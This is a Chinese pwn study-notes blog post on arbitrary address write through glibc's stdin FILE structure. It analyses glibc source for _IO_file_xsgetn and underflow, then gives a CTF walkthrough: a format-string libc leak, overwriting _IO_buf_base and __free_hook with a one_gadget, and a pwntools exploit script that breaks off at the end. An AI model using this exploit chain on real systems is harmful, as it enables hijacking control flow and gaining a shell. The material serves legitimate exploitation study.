【我的 PWN 学习手札】IO_FILE 之 stdin任意地址写

我们知道，stdin会往“缓冲区”先读入数据，如果我们劫持这个所谓“缓冲区”到其他地址呢？是否可以读入数据到任意地址？答案是肯定的。

注意！代码中的“-------”分隔，是为了区分一条调用链上不同代码片段，此外没有其他含义

目录

前言

一、_IO_2_1_stdin读入链，及利用思路

（一）_IO_file_xsgetn相关源码分析与条件绕过 

（二）__underflow相关源码分析与条件绕过

（三）利用条件总结 

二、利用图示

三、从一道题学习stdin任意地址写 

（一）格式化字符串泄露libc 

（二）_IO_buf_base处写一个字节'\x00' 

​（三）写入__free_hook指针，准备修改

（四）写入ogg，不断调试

四、exp 

---

前言

不直接调用sys_read，而是通过IO_FILE结构，通过设置缓冲区来减小频繁系统调用开销。我们将从IO_FILE相关结构分析，了解这一模式，再探讨利用标准输入（以及_IO_2_1_stdin）劫持所谓的缓冲区到任意地址，实现任意地址写。

---

一、_IO_2_1_stdin读入链，及利用思路

从【我的 PWN 学习手札】IO_FILE相关几个基本函数的调用链源码-CSDN博客

我们已经事先分析过通过fread简单分析了_IO_2_1_stdin读入的调用链和基本过程。在这里简单再复述一下，不过从关键函数开始：

extern struct _IO_FILE_plus _IO_2_1_stdin

这个和标准输入相关的_IO_FILE_plus结构体的vtable指向一个固定的虚函数表：

#  define DEF_STDFILE(NAME, FD, CHAIN, FLAGS) \struct _IO_FILE_plus NAME \= {FILEBUF_LITERAL(CHAIN, FLAGS, FD, NULL), \&_IO_file_jumps};DEF_STDFILE(_IO_2_1_stdin_, 0, 0, _IO_NO_WRITES);const struct _IO_jump_t _IO_file_jumps =
{JUMP_INIT_DUMMY,JUMP_INIT(finish, _IO_file_finish),JUMP_INIT(overflow, _IO_file_overflow),JUMP_INIT(underflow, _IO_file_underflow),JUMP_INIT(uflow, _IO_default_uflow),JUMP_INIT(pbackfail, _IO_default_pbackfail),JUMP_INIT(xsputn, _IO_file_xsputn),JUMP_INIT(xsgetn, _IO_file_xsgetn),JUMP_INIT(seekoff, _IO_new_file_seekoff),JUMP_INIT(seekpos, _IO_default_seekpos),JUMP_INIT(setbuf, _IO_new_file_setbuf),JUMP_INIT(sync, _IO_new_file_sync),JUMP_INIT(doallocate, _IO_file_doallocate),JUMP_INIT(read, _IO_file_read),JUMP_INIT(write, _IO_new_file_write),JUMP_INIT(seek, _IO_file_seek),JUMP_INIT(close, _IO_file_close),JUMP_INIT(stat, _IO_file_stat),JUMP_INIT(showmanyc, _IO_default_showmanyc),JUMP_INIT(imbue, _IO_default_imbue)
};
libc_hidden_data_def (_IO_file_jumps)

以读入函数scanf为例

int
attribute_hidden
scanf (const char *fmt, ...)
{va_list arg;int done;va_start (arg, fmt);done = __nldbl__IO_vfscanf (stdin, fmt, arg, NULL);va_end (arg);return done;
}
-----------------------------------------------------------
int
attribute_compat_text_section
__nldbl__IO_vfscanf (FILE *s, const char *fmt, _IO_va_list ap,int *errp)
{int res;set_no_long_double ();res = _IO_vfscanf (s, fmt, ap, errp);clear_no_long_double ();return res;
}
-----------------------------------------------------------
// 最后调用_IO_file_jumps中的_IO_file_xsgetn函数

让我们关键分析IO_FILE虚表函数操作内部的具体过程

_IO_size_t
_IO_file_xsgetn (_IO_FILE *fp, void *data, _IO_size_t n)
{_IO_size_t want, have;_IO_ssize_t count;char *s = data;want = n;if (fp->_IO_buf_base == NULL){/* Maybe we already have a push back pointer.  */if (fp->_IO_save_base != NULL){free (fp->_IO_save_base);fp->_flags &= ~_IO_IN_BACKUP;}_IO_doallocbuf (fp);}while (want > 0){have = fp->_IO_read_end - fp->_IO_read_ptr;if (want <= have){memcpy (s, fp->_IO_read_ptr, want);fp->_IO_read_ptr += want;want = 0;}else{if (have > 0){
#ifdef _LIBCs = __mempcpy (s, fp->_IO_read_ptr, have);
#elsememcpy (s, fp->_IO_read_ptr, have);s += have;
#endifwant -= have;fp->_IO_read_ptr += have;}/* Check for backup and repeat */if (_IO_in_backup (fp)){_IO_switch_to_main_get_area (fp);continue;}/* If we now want less than a buffer, underflow and repeatthe copy.  Otherwise, _IO_SYSREAD directly tothe user buffer. */if (fp->_IO_buf_base&& want < (size_t) (fp->_IO_buf_end - fp->_IO_buf_base)){if (__underflow (fp) == EOF)break;continue;}/* These must be set before the sysread as we might longjmp outwaiting for input. */_IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);_IO_setp (fp, fp->_IO_buf_base, fp->_IO_buf_base);/* Try to maintain alignment: read a whole number of blocks.  */count = want;if (fp->_IO_buf_base){_IO_size_t block_size = fp->_IO_buf_end - fp->_IO_buf_base;if (block_size >= 128)count -= want % block_size;}count = _IO_SYSREAD (fp, s, count);if (count <= 0){if (count == 0)fp->_flags |= _IO_EOF_SEEN;elsefp->_flags |= _IO_ERR_SEEN;break;}s += count;want -= count;if (fp->_offset != _IO_pos_BAD)_IO_pos_adjust (fp->_offset, count);}}return n - want;
}
libc_hidden_def (_IO_file_xsgetn)

（一）_IO_file_xsgetn相关源码分析与条件绕过 

1、如果_IO_buf_base == NULL，则会进行初始化的操作，这是我们需要避免的，否则控制相关指针已经没有意义

  if (fp->_IO_buf_base == NULL){/* Maybe we already have a push back pointer.  */if (fp->_IO_save_base != NULL){free (fp->_IO_save_base);fp->_flags &= ~_IO_IN_BACKUP;}_IO_doallocbuf (fp);}

 2、如果 fp->_IO_read_end > fp->_IO_read_ptr 会将缓冲区中对应的数据复制到目标地址中，为了避免因为这个出现不必要的问题，最好令 fp->_IO_read_end = fp >_IO_read_ptr

{...have = fp->_IO_read_end - fp->_IO_read_ptr;  // 已经读入缓冲区且还没写入到目标地址的字节数if (want <= have) // 需要的字节数小于已经读入的字节数，则使用memcpy将缓冲区的一部分数据拷贝到目标地址{memcpy (s, fp->_IO_read_ptr, want); // 已经读入足够的数据，直接拷贝fp->_IO_read_ptr += want;want = 0;}else // 否则还需要往缓冲区内读入数据{if (have > 0) // 如果存在，在IO缓冲区、但尚未写入到目标地址的数据，则先将已有的数据拷贝{
#ifdef _LIBCs = __mempcpy (s, fp->_IO_read_ptr, have);
#elsememcpy (s, fp->_IO_read_ptr, have); // 将缓冲区已有的数据拷贝到ss += have;
#endifwant -= have;fp->_IO_read_ptr += have;}...}...
}

3、如果需要的数据大于缓冲区数据，则直接使用sys_read读入到目标地址s，这也是我们要避免的。因此_IO_buf_end和_IO_buf_base之间距离要合适

while(want>0)
{...if (fp->_IO_buf_base&& want < (size_t) (fp->_IO_buf_end - fp->_IO_buf_base)) // 读入的数据长度如果大于缓冲区大小会采用sysread直接读入的方式，否则用underflow{...}...count = _IO_SYSREAD (fp, s, count);...
}

4、对于3的另一个分支，即，如果需要的数据小于缓冲区数据，则调用underflow填充缓冲区，这是我们需要的执行路线

	  if (fp->_IO_buf_base&& want < (size_t) (fp->_IO_buf_end - fp->_IO_buf_base)) // 读入的数据长度如果大于缓冲区大小会采用sysread直接读入的方式，否则用underflow{if (__underflow (fp) == EOF) // underflow函数用于在缓冲区为空时，从文件中读取新的数据并填充到缓冲区中，以便后续的读操作可以继续进行break;continue;}

最后呢是进入了__underflow，对缓冲区进行一个填充。我们接下来关注这部分代码的调用链关系。 

（二）__underflow相关源码分析与条件绕过

int
__underflow (_IO_FILE *fp)
{
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_Tif (_IO_vtable_offset (fp) == 0 && _IO_fwide (fp, -1) != -1)return EOF;
#endifif (fp->_mode == 0)_IO_fwide (fp, -1);if (_IO_in_put_mode (fp))if (_IO_switch_to_get_mode (fp) == EOF)return EOF;if (fp->_IO_read_ptr < fp->_IO_read_end)return *(unsigned char *) fp->_IO_read_ptr;if (_IO_in_backup (fp)){_IO_switch_to_main_get_area (fp);if (fp->_IO_read_ptr < fp->_IO_read_end)return *(unsigned char *) fp->_IO_read_ptr;}if (_IO_have_markers (fp)){if (save_for_backup (fp, fp->_IO_read_end))return EOF;}else if (_IO_have_backup (fp))_IO_free_backup_area (fp);return _IO_UNDERFLOW (fp);
}
libc_hidden_def (__underflow)
--------------------------------------------------------------------------
#define _IO_UNDERFLOW(FP) JUMP0 (__underflow, FP)
--------------------------------------------------------------------------
const struct _IO_jump_t _IO_file_jumps =
{...JUMP_INIT(underflow, _IO_file_underflow),...
}
--------------------------------------------------------------------------
# define _IO_new_file_underflow _IO_file_underflow
--------------------------------------------------------------------------
int
_IO_new_file_underflow (_IO_FILE *fp)
{_IO_ssize_t count;
#if 0/* SysV does not make this test; take it out for compatibility */if (fp->_flags & _IO_EOF_SEEN)return (EOF);
#endifif (fp->_flags & _IO_NO_READS){fp->_flags |= _IO_ERR_SEEN;__set_errno (EBADF);return EOF;}if (fp->_IO_read_ptr < fp->_IO_read_end)return *(unsigned char *) fp->_IO_read_ptr;if (fp->_IO_buf_base == NULL){/* Maybe we already have a push back pointer.  */if (fp->_IO_save_base != NULL){free (fp->_IO_save_base);fp->_flags &= ~_IO_IN_BACKUP;}_IO_doallocbuf (fp);}/* Flush all line buffered files before reading. *//* FIXME This can/should be moved to genops ?? */if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED)){
#if 0_IO_flush_all_linebuffered ();
#else/* We used to flush all line-buffered stream.  This really isn'trequired by any standard.  My recollection is thattraditional Unix systems did this for stdout.  stderr betternot be line buffered.  So we do just that hereexplicitly.  --drepper */_IO_acquire_lock (_IO_stdout);if ((_IO_stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF))== (_IO_LINKED | _IO_LINE_BUF))_IO_OVERFLOW (_IO_stdout, EOF);_IO_release_lock (_IO_stdout);
#endif}_IO_switch_to_get_mode (fp);/* This is very tricky. We have to adjust thosepointers before we call _IO_SYSREAD () sincewe may longjump () out while waiting forinput. Those pointers may be screwed up. H.J. */fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;fp->_IO_read_end = fp->_IO_buf_base;fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end= fp->_IO_buf_base;count = _IO_SYSREAD (fp, fp->_IO_buf_base,fp->_IO_buf_end - fp->_IO_buf_base);if (count <= 0){if (count == 0)fp->_flags |= _IO_EOF_SEEN;elsefp->_flags |= _IO_ERR_SEEN, count = 0;}fp->_IO_read_end += count;if (count == 0){/* If a stream is read to EOF, the calling application may switch activehandles.  As a result, our offset cache would no longer be valid, sounset it.  */fp->_offset = _IO_pos_BAD;return EOF;}if (fp->_offset != _IO_pos_BAD)_IO_pos_adjust (fp->_offset, count);return *(unsigned char *) fp->_IO_read_ptr;
}
libc_hidden_ver (_IO_new_file_underflow, _IO_file_underflow)

经过一系列判断和调用，利用标准输入的__underflow，实际上调用了__IO_new_file_underflow实现相关功能。为此我们对该函数进行具体分析：

1、_IO_NO_READS不能置位

#define _IO_NO_READS 4 /* Reading not allowed */
------------------------------------------------------if (fp->_flags & _IO_NO_READS){fp->_flags |= _IO_ERR_SEEN;__set_errno (EBADF);return EOF;}

2、 _IO_LINE_BUF和_IO_UNBUFFERED最好不置位，但有时候好像也无影响

#define _IO_LINE_BUF 0x200
#define _IO_UNBUFFERED 2
------------------------------------------------------if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED)) // 检查文件流是否是行缓冲或无缓冲流，是的话执行特定刷新操作{
#if 0_IO_flush_all_linebuffered ();
#else/* We used to flush all line-buffered stream.  This really isn'trequired by any standard.  My recollection is thattraditional Unix systems did this for stdout.  stderr betternot be line buffered.  So we do just that hereexplicitly.  --drepper */_IO_acquire_lock (_IO_stdout);if ((_IO_stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF))== (_IO_LINKED | _IO_LINE_BUF))_IO_OVERFLOW (_IO_stdout, EOF);_IO_release_lock (_IO_stdout);
#endif}

3、设置好缓冲区指针，然后往缓冲区读入数据。如果劫持_IO_buf_base，就可以实现任意地址写；当然，隐含条件是fp->_fileno=0，即stdin

  /* This is very tricky. We have to adjust thosepointers before we call _IO_SYSREAD () sincewe may longjump () out while waiting forinput. Those pointers may be screwed up. H.J. */fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;fp->_IO_read_end = fp->_IO_buf_base;fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end= fp->_IO_buf_base;count = _IO_SYSREAD (fp, fp->_IO_buf_base,fp->_IO_buf_end - fp->_IO_buf_base);

（三）利用条件总结 

将上述条件综合表述为：

1. 设置 _IO_read_end 等于 _IO_read_ptr 。
2. 设置 _flag &~ （ _IO_NO_READS | _IO_LINE_BUF | _IO_UNBUFFERED ) 即 _flag &~ 0x206（后两个置位有时候不影响）。
3. 设置 _fileno 为 0 ，表示读入数据的来源是 stdin 。
4. 设置 _IO_buf_base 为 write_start ，_IO_buf_end 为 write_end ；
5. 设置使得 _IO_buf_end - _IO_buf_base 大于要读的数据。

二、利用图示

我们知道，利用缓冲区，是为了避免进行频繁系统调用耗费资源。

类似于从海上进货，不可能每次需要多少就让多少船承载多少来；而是尽量装的满满的，虽然你只需要一点，但是多的我可以存在码头仓库，你需要更多直接在仓库拿就好；仓库用完了，再让船满载进货... ...

因此一开始，会SYS_READ数据到缓冲区，也即“仓库” 

而取了多少货呢？这就是从base到_IO_read_ptr指向的区域

如果我们劫持_IO_buf_base和_IO_buf_end

下一次stdin时，就会重新置位指针

然后就可以往目标地址进行写数据

三、从一道题学习stdin任意地址写 

本题的思路是：

1. 利用格式化字符串漏洞泄露libc
2. 通过溢出覆盖局部变量，在_IO_buf_base处写一个字节'\x00' 
3. 再次读入可修改_IO_2_1_stdin的相关数据，再次修改_IO_buf_base到__free_hook
4. 再次输入（但不是read）写入ogg

（一）格式化字符串泄露libc 

没什么技术含量，也不是本篇博客技术重点

### leak libc
# io.sendlineafter(b"name:",b'%p'*40+b'ABCDEFGH')
io.sendlineafter(b"name:",b'%p'*34+b'ABCDEFGH')
gdb.attach(io)
# print(io.recv())
libc.address=int(io.recvuntil(b'ABCDEFGH',drop=True)[-14:],16)-0x20730
success(hex(libc.address))

（二）_IO_buf_base处写一个字节'\x00' 

接下来通过栈溢出覆盖关键指针，使得在_IO_write_base上写一个字节'\x00'

### write one byte '\x00' at _IO_2_1_stdin_.file._IO_buf_base
io.sendlineafter(b'(1:yes):',b'0')
io.sendlineafter(b"name:",b'a'*80+p64(libc.address+0x39b918))
io.sendlineafter(b'(1:yes):',b'1')
io.sendlineafter(b'message:',b'bbbb')

接下类通过_IO_2_1_stdin_的读入操作，就会重新置位_IO_read_*相关指针往缓冲区内写数据

 （三）写入__free_hook指针，准备修改

### re-write part of _IO_2_1_stdin_.file , read for edit __free_hook
payload=b''
payload+=b'a'*8*3 # _IO_write_base/ptr/end
payload+=p64(libc.sym['__free_hook'])+p64(libc.sym['__free_hook']+8)
payload=payload.ljust(0x64,b'\x00')
io.sendlineafter(b"continue?(1:no)",payload)

但是注意，我们之前总结的一些条件已经不满足了，例如_IO_read_ptr和_IO_read_end不同了。IO已经被打坏了，这意味着我们需要一些技巧继续利用 

（四）写入ogg，不断调试

这时候IO已经坏了，可能要缓冲很多才会进行复制。我们利用pwndbg的cyclic生成垃圾字节，通过最终跳转来确认合适的偏移 

payload=b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaaj'
io.sendlineafter(b'message:',payload)
io.sendline(b'1\n'*100)

然而

我们发现由于_IO_buf_base和_IO_buf_end恰好设置在__free_hook，所以读入的这么多数据，大多都会经过这一块缓冲区缓存，所以后面的一连串'1\n'，又重新覆写了__free_hook了。为此我们调整一下_IO_buf_base和_IO_buf_end的位置 

### re-write part of _IO_2_1_stdin_.file , read for edit __free_hook
payload=b''
payload+=b'a'*8*3 # _IO_write_base/ptr/end
# payload+=p64(libc.sym['__free_hook'])+p64(libc.sym['__free_hook']+8)
payload+=p64(libc.sym['__free_hook']-0x10)+p64(libc.sym['__free_hook']+0x10)
payload=payload.ljust(0x64,b'\x00')
io.sendlineafter(b"continue?(1:no)",payload)

然后继续 

可以看到，通过__free_hook跳转到了某个区域，接下来我们将这个区域替换成deadbeef验证

payload=b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaakuaakvaakwaakxaakyaakzaalbaalcaaldaaleaalfaalgaalhaaliaaljaalkaallaalmaalnaaloaalpaalqaalraalsaaltaaluaalvaalwaalxaalyaalzaambaamcaamdaameaamfaamgaamhaamiaamjaamkaamlaammaamnaamoaampaamqaamraamsaamtaamuaamvaamwaamxaamyaamzaanbaancaandaaneaanfaangaanhaaniaanjaankaanlaanmaannaanoaanpaanqaanraansaantaanuaanvaanwaanxaanyaanzaaobaaocaaodaaoeaaofaaogaaohaaoiaaojaaokaaolaaomaaonaaooaaopaaoqaaoraaosaaotaaouaaovaaowaaoxaaoyaaozaapbaapcaapdaapeaapfaapgaaphaapiaapjaapkaaplaapmaapnaapoaappaapqaapraapsaaptaapuaapvaapwaapxaapyaapzaaqbaaqcaaqdaaqeaaqfaaqgaaqhaaqiaaqjaaqkaaqlaaqmaaqnaaqoaaqpaaqqaaqraaqsaaqtaaquaaqvaaqwaaqxaaqyaaqzaarbaarcaardaareaarfaargaarhaariaarjaarkaarlaarmaarnaaroaarpaarqaarraarsaartaaruaarvaarwaarxaaryaarzaasbaascaasdaaseaasfaasgaashaasiaasjaaskaaslaasmaasnaasoaaspaasqaasraassaastaasuaasvaaswaasxaasyaaszaatbaatcaatdaateaatfaatgaathaatiaatjaatkaatlaatmaatnaatoaatpaatqaatraatsaattaatuaatvaatwaatxaatyaat'
payload=payload.replace(b'waaaaaae',b'deadbeef')

可以看到，我们已经控制了__free_hook。接下来填充ogg 

payload=b'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaaezaaaaaafbaaaaaafcaaaaaafdaaaaaafeaaaaaaffaaaaaafgaaaaaafhaaaaaafiaaaaaafjaaaaaafkaaaaaaflaaaaaafmaaaaaafnaaaaaafoaaaaaafpaaaaaafqaaaaaafraaaaaafsaaaaaaftaaaaaafuaaaaaafvaaaaaafwaaaaaafxaaaaaafyaaaaaafzaaaaaagbaaaaaagcaaaaaagdaaaaaageaaaaaagfaaaaaaggaaaaaaghaaaaaagiaaaaaagjaaaaaagkaaaaaaglaaaaaagmaaaaaagnaaaaaagoaaaaaagpaaaaaagqaaaaaagraaaaaagsaaaaaagtaaaaaaguaaaaaagvaaaaaagwaaaaaagxaaaaaagyaaaaaagzaaaaaahbaaaaaahcaaaaaahdaaaaaaheaaaaaahfaaaaaahgaaaaaahhaaaaaahiaaaaaahjaaaaaahkaaaaaahlaaaaaahmaaaaaahnaaaaaahoaaaaaahpaaaaaahqaaaaaahraaaaaahsaaaaaahtaaaaaahuaaaaaahvaaaaaahwaaaaaahxaaaaaahyaaaaaahzaaaaaaibaaaaaaicaaaaaaidaaaaaaieaaaaaaifaaaaaaigaaaaaaihaaaaaaiiaaaaaaijaaaaaaikaaaaaailaaaaaaimaaaaaainaaaaaaioaaaaaaipaaaaaaiqaaaaaairaaaaaaisaaaaaaitaaaaaaiuaaaaaaivaaaaaaiwaaaaaaixaaaaaaiyaaaaaaizaaaaaajbaaaaaajcaaaaaajdaaaaaajeaaaaaajfaaaaaajgaaaaaajhaaaaaajiaaaaaajjaaaaaajkaaaaaajlaaaaaajmaaaaaajnaaaaaajoaaaaaajpaaaaaajqaaaaaajraaaaaajsaaaaaajtaaaaaajuaaaaaajvaaaaaajwaaaaaajxaaaaaajyaaaaaaj'
'''
0x3f3e6 execve("/bin/sh", rsp+0x30, environ)
constraints:address rsp+0x40 is writablerax == NULL || {rax, "-c", rbx, NULL} is a valid argv0x3f43a execve("/bin/sh", rsp+0x30, environ)
constraints:[rsp+0x30] == NULL || {[rsp+0x30], [rsp+0x38], [rsp+0x40], [rsp+0x48], ...} is a valid argv0xd5c07 execve("/bin/sh", rsp+0x70, environ)
constraints:[rsp+0x70] == NULL || {[rsp+0x70], [rsp+0x78], [rsp+0x80], [rsp+0x88], ...} is a valid argv
'''
oggs=[i+libc.address for i in [0x3f3e6,0x3f43a,0xd5c07]]
payload=payload.replace(b'waaaaaae',p64(oggs[1]))

 但是看到execve时参数有问题，看了一眼是咱们之前覆写栈指针时填充的'a'，将其改为0

# io.sendlineafter(b"name:",b'a'*80+p64(libc.address+0x39b918))
io.sendlineafter(b"name:",b'\x00'*80+p64(libc.address+0x39b918))

 再次执行

 

成功getshell

四、exp 

题目来自看雪

exp：

from pwn import *context.log_level='debug'
context.arch='amd64'
io=process("./pwn")
libc=ELF("./libc-2.23.so")
io.sendlineafter(b'Size:',b'32')### leak libc
io.sendlineafter(b"name:",b'%p'*34+b'ABCDEFGH')
# print(io.recv())
libc.address=int(io.recvuntil(b'ABCDEFGH',drop=True)[-14:],16)-0x20730
success(hex(libc.address))### write one byte '\x00' at _IO_2_1_stdin.file._IO_buf_base
io.sendlineafter(b'(1:yes):',b'0')
io.sendlineafter(b"name:",b'\x00'*80+p64(libc.address+0x39b918))
io.sendlineafter(b'(1:yes):',b'1')
io.sendlineafter(b'message:',b'bbbb')### re-write part of _IO_2_1_stdin_.file , read for edit __free_hook
payload=b''
payload+=b'a'*8*3 # _IO_write_base/ptr/end
# payload+=p64(libc.sym['__free_hook'])+p64(libc.sym['__free_hook']+8)
payload+=p64(libc.sym['__free_hook']-0x10)+p64(libc.sym['__free_hook']+0x10)
payload=payload.ljust(0x64,b'\x00')
io.sendlineafter(b"continue?(1:no)",payload)
gdb.attach(io,'b free\nc')
sleep(0.5)### write
payload=b'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaaezaaaaaafbaaaaaafcaaaaaafdaaaaaafeaaaaaaffaaaaaafgaaaaaafhaaaaaafiaaaaaafjaaaaaafkaaaaaaflaaaaaafmaaaaaafnaaaaaafoaaaaaafpaaaaaafqaaaaaafraaaaaafsaaaaaaftaaaaaafuaaaaaafvaaaaaafwaaaaaafxaaaaaafyaaaaaafzaaaaaagbaaaaaagcaaaaaagdaaaaaageaaaaaagfaaaaaaggaaaaaaghaaaaaagiaaaaaagjaaaaaagkaaaaaaglaaaaaagmaaaaaagnaaaaaagoaaaaaagpaaaaaagqaaaaaagraaaaaagsaaaaaagtaaaaaaguaaaaaagvaaaaaagwaaaaaagxaaaaaagyaaaaaagzaaaaaahbaaaaaahcaaaaaahdaaaaaaheaaaaaahfaaaaaahgaaaaaahhaaaaaahiaaaaaahjaaaaaahkaaaaaahlaaaaaahmaaaaaahnaaaaaahoaaaaaahpaaaaaahqaaaaaahraaaaaahsaaaaaahtaaaaaahuaaaaaahvaaaaaahwaaaaaahxaaaaaahyaaaaaahzaaaaaaibaaaaaaicaaaaaaidaaaaaaieaaaaaaifaaaaaaigaaaaaaihaaaaaaiiaaaaaaijaaaaaaikaaaaaailaaaaaaimaaaaaainaaaaaaioaaaaaaipaaaaaaiqaaaaaairaaaaaaisaaaaaaitaaaaaaiuaaaaaaivaaaaaaiwaaaaaaixaaaaaaiyaaaaaaizaaaaaajbaaaaaajcaaaaaajdaaaaaajeaaaaaajfaaaaaajgaaaaaajhaaaaaajiaaaaaajjaaaaaajkaaaaaajlaaaaaajmaaaaaajnaaaaaajoaaaaaajpaaaaaajqaaaaaajraaaaaajsaaaaaajtaaaaaajuaaaaaajvaaaaaajwaaaaaajxaaaaaajyaaaaaaj'
'''
0x3f3e6 execve("/bin/sh", rsp+0x30, environ)
